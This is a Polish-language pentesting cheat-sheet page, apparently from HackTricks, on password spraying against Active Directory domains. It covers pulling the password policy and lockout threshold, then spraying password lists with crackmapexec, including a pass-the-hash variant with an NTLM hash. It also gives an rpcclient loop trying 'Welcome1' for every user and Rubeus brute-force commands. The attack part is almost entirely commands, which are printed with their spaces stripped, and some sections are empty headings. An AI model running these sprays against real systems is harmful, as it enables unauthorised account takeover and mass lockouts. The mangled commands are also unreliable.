Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y doHackTricks i HackTricks Cloud repozytoriów na GitHubie.
Sprejowanie hasła
Gdy znajdziesz kilka poprawnych nazw użytkowników, możesz spróbować najczęstszych haseł (pamiętaj o polityce haseł w środowisku) z każdym z odkrytych użytkowników.
Domyślnie minimalnadługość hasła wynosi 7.
Zauważ, że możesz zablokować niektóre konta, jeśli spróbujesz kilka razy złych haseł (domyślnie więcej niż 10).
Pobierz politykę hasła
Jeśli masz pewne dane uwierzytelniające użytkownika lub dostęp do powłoki jako użytkownik domeny, możesz uzyskać politykę hasła za pomocą:
# From Linuxcrackmapexec<IP>-u'user'-p'password'--pass-polenum4linux-u'username'-p'password'-P<IP>rpcclient-U""-N10.10.10.10;rpcclient $>querydominfoldapsearch-h10.10.10.10-x-b"DC=DOMAIN_NAME,DC=LOCAL"-ssub"*"|grep-m1-B10pwdHistoryLength# From Windowsnetaccounts(Get-DomainPolicy)."SystemAccess"#From powerview
Wykorzystanie z systemu Linux (lub innego)
Korzystając z crackmapexec:
crackmapexecsmb<IP>-uusers.txt-ppasswords.txt# Local Auth Spray (once you found some local admin pass or hash)## --local-auth flag indicate to only try 1 time per machinecrackmapexecsmb--local-auth10.10.10.10/23-uadministrator-H10298e182387f9cab376ecd08491764a0|grep+
Za pomocą modułu scanner/smb/smb_login w Metasploit:
Korzystając z rpcclient:
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/for u in$(catusers.txt); dorpcclient-U"$u%Welcome1"-c"getusername;quit"10.10.10.10|grepAuthority;done
# with a list of users.\Rubeus.exe brute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exe brute/passwords:<passwords_file>/outfile:<output_file>
Za pomocą Invoke-DomainPasswordSpray (Domyślnie może generować użytkowników z domeny i pobierać politykę hasła z domeny, ograniczając liczbę prób zgodnie z nią):